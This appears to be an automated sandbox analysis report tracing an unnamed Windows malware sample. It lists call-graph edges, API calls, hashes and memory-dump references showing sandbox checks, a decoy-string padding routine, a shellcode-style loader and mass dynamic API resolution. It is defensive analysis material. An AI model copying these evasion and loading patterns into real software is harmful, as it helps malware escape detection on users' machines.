41a820 lstrlenA lstrcpy 27610->27612 27611 41a820 2 API calls 27611->27600 27612->27599 27612->27600 27612->27601 27612->27602 27612->27603 27612->27604 27612->27605 27612->27606 27612->27607 27612->27608 27612->27609 27612->27610 27612->27611 27613->26522 27614->26524 27615->26530 27616->26532 27617->26538 27618->26540 27619->26544 27620->26548 27621->26552 27622->26558 27623->26560 27624->26564 27625->26578 27626->26582 27627->26581 27628->26577 27629->26581 27630->26595 27631->26615 27632->26599 27633->26608 27634->26592 27635->26600 27636->26601 27637->26604 27638->26611 27639->26634 27640->26639 27641->26638 27642->26635 27643->26638 27644->26648 27647 41a7a0 lstrcpy 27646->27647 27648 401683 27647->27648 27649 41a7a0 lstrcpy 27648->27649 27650 401695 27649->27650 27651 41a7a0 lstrcpy 27650->27651 27652 4016a7 27651->27652 27653 41a7a0 lstrcpy 27652->27653 27654 4015a3 27653->27654 27654->27374 27679 401030 27655->27679 27659 404838 lstrlenA 27682 41aad0 27659->27682 27661 404848 InternetCrackUrlA 27662 404867 27661->27662 27662->27451 27664 409af9 LocalAlloc 27663->27664 27665 404eee 27663->27665 27664->27665 27666 409b14 CryptStringToBinaryA 27664->27666 27665->27473 27665->27475 27666->27665 27667 409b39 LocalFree 27666->27667 27667->27665 27668->27467 27669->27470 27670->27490 27671->27505 27672->27518 27673->27538 27674->27550 27675->27570 27676->27576 27677->27578 27678->27585 27680 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27679->27680 27681 41aad0 27680->27681 27681->27659 27682->27661 27683->27595 27754 2f16a40 6 API calls 27816 416ab1 902 API calls 27755 2f13b7d 91 API calls 2 library calls 27773 4069f3 7 API calls 27819 41cafe 219 API calls 4 library calls 27820 2f11c35 110 API calls 27776 2f09b37 9 API calls 26255 401190 26262 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26255->26262 26257 40119e 26258 4011cc 26257->26258 26264 417850 GetProcessHeap HeapAlloc GetUserNameA 26257->26264 26260 4011b7 26260->26258 26261 4011c4 ExitProcess 26260->26261 26263 417939 26262->26263 26263->26257 26265 4178c3 26264->26265 26265->26260 27853 2f11525 strtok_s StrCmpCA strtok_s codecvt 27778 2f0932a ??2@YAPAXI RaiseException allocator 27823 41ce9f 69 API calls __amsg_exit 27758 2f115b3 19 API calls codecvt 27759 4088a4 RaiseException task __CxxThrowException@8 27760 4180a5 GetProcessHeap HeapFree 27781 2f112eb strtok_s lstrlen lstrcpy 27782 41b9b0 RtlUnwind 27685 2f00005 27690 2f0092b GetPEB 27685->27690 27687 2f00030 27691 2f0003c 27687->27691 27690->27687 27692 2f00049 27691->27692 27706 2f00e0f SetErrorMode SetErrorMode 27692->27706 27697 2f00265 27698 2f002ce VirtualProtect 27697->27698 27700 2f0030b 27698->27700 27699 2f00439 VirtualFree 27704 2f005f4 LoadLibraryA 27699->27704 27705 2f004be 27699->27705 27700->27699 27701 2f004e3 LoadLibraryA 27701->27705 27703 2f008c7 27704->27703 27705->27701 27705->27704 27707 2f00223 27706->27707 27708 2f00d90 27707->27708 27709 2f00dad 27708->27709 27710 2f00dbb GetPEB 27709->27710 27711 2f00238 VirtualAlloc 27709->27711 27710->27711 27711->27697 27855 2f1d106 41 API calls __amsg_exit 27763 2f16a0a ExitProcess

                                                  Executed Functions

                                                  Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                  • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                  • strlen.MSVCRT ref: 004046F0
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                  Strings
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                  • API String ID: 2127927946-2218711628
                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E
                                                  Function 00417850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocNameProcessUser
                                                  • String ID:
                                                  • API String ID: 1206570057-0
                                                  • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                  • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                  • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                  • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                  Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                  • ExitProcess.KERNEL32 ref: 0040117E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitInfoProcessSystem
                                                  • String ID:
                                                  • API String ID: 752954902-0
                                                  • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                  • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                  • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                  • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6
                                                  Function 00419C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                                  APIs
                                                  • GetProcAddress.KERNEL32(75900000,02D123A0), ref: 00419C2D
                                                  • GetProcAddress.KERNEL32(75900000,02D125C0), ref: 00419C45
                                                  • GetProcAddress.KERNEL32(75900000,02D45E78), ref: 00419C5E
                                                  • GetProcAddress.KERNEL32(75900000,02D45E90), ref: 00419C76
                                                  • GetProcAddress.KERNEL32(75900000,02D45F08), ref: 00419C8E
                                                  • GetProcAddress.KERNEL32(75900000,02D45F98), ref: 00419CA7
                                                  • GetProcAddress.KERNEL32(75900000,02D15B38), ref: 00419CBF
                                                  • GetProcAddress.KERNEL32(75900000,02D45FC8), ref: 00419CD7
                                                  • GetProcAddress.KERNEL32(75900000,02D46088), ref: 00419CF0
                                                  • GetProcAddress.KERNEL32(75900000,02D460B8), ref: 00419D08
                                                  • GetProcAddress.KERNEL32(75900000,02D460D0), ref: 00419D20
                                                  • GetProcAddress.KERNEL32(75900000,02D123E0), ref: 00419D39
                                                  • GetProcAddress.KERNEL32(75900000,02D12420), ref: 00419D51
                                                  • GetProcAddress.KERNEL32(75900000,02D12400), ref: 00419D69
                                                  • GetProcAddress.KERNEL32(75900000,02D124A0), ref: 00419D82
                                                  • GetProcAddress.KERNEL32(75900000,02D46058), ref: 00419D9A
                                                  • GetProcAddress.KERNEL32(75900000,02D46118), ref: 00419DB2
                                                  • GetProcAddress.KERNEL32(75900000,02D15890), ref: 00419DCB
                                                  • GetProcAddress.KERNEL32(75900000,02D12440), ref: 00419DE3
                                                  • GetProcAddress.KERNEL32(75900000,02D46100), ref: 00419DFB
                                                  • GetProcAddress.KERNEL32(75900000,02D460E8), ref: 00419E14
                                                  • GetProcAddress.KERNEL32(75900000,02D46070), ref: 00419E2C
                                                  • GetProcAddress.KERNEL32(75900000,02D460A0), ref: 00419E44
                                                  • GetProcAddress.KERNEL32(75900000,02D12620), ref: 00419E5D
                                                  • GetProcAddress.KERNEL32(75900000,02D48A98), ref: 00419E75
                                                  • GetProcAddress.KERNEL32(75900000,02D48C90), ref: 00419E8D
                                                  • GetProcAddress.KERNEL32(75900000,02D48AB0), ref: 00419EA6
                                                  • GetProcAddress.KERNEL32(75900000,02D48CF0), ref: 00419EBE
                                                  • GetProcAddress.KERNEL32(75900000,02D48D50), ref: 00419ED6
                                                  • GetProcAddress.KERNEL32(75900000,02D48D08), ref: 00419EEF
                                                  • GetProcAddress.KERNEL32(75900000,02D48D20), ref: 00419F07
                                                  • GetProcAddress.KERNEL32(75900000,02D48CA8), ref: 00419F1F
                                                  • GetProcAddress.KERNEL32(75900000,02D48AF8), ref: 00419F38
                                                  • GetProcAddress.KERNEL32(75900000,02D14C88), ref: 00419F50
                                                  • GetProcAddress.KERNEL32(75900000,02D48B70), ref: 00419F68
                                                  • GetProcAddress.KERNEL32(75900000,02D48AC8), ref: 00419F81
                                                  • GetProcAddress.KERNEL32(75900000,02D12580), ref: 00419F99
                                                  • GetProcAddress.KERNEL32(75900000,02D48D38), ref: 00419FB1
                                                  • GetProcAddress.KERNEL32(75900000,02D12500), ref: 00419FCA
                                                  • GetProcAddress.KERNEL32(75900000,02D48D68), ref: 00419FE2
                                                  • GetProcAddress.KERNEL32(75900000,02D48A80), ref: 00419FFA
                                                  • GetProcAddress.KERNEL32(75900000,02D125A0), ref: 0041A013
                                                  • GetProcAddress.KERNEL32(75900000,02D125E0), ref: 0041A02B
                                                  • LoadLibraryA.KERNEL32(02D48B58,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                  • LoadLibraryA.KERNEL32(02D48C18,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                  • LoadLibraryA.KERNEL32(02D48AE0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                  • LoadLibraryA.KERNEL32(02D48B10,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                  • LoadLibraryA.KERNEL32(02D48B28,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                  • LoadLibraryA.KERNEL32(02D48B40,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                  • LoadLibraryA.KERNEL32(02D48BA0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                  • LoadLibraryA.KERNEL32(02D48C30,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                  • GetProcAddress.KERNEL32(75FD0000,02D12600), ref: 0041A0DA
                                                  • GetProcAddress.KERNEL32(75FD0000,02D48B88), ref: 0041A0F2
                                                  • GetProcAddress.KERNEL32(75FD0000,02D45D10), ref: 0041A10A
                                                  • GetProcAddress.KERNEL32(75FD0000,02D48BB8), ref: 0041A123
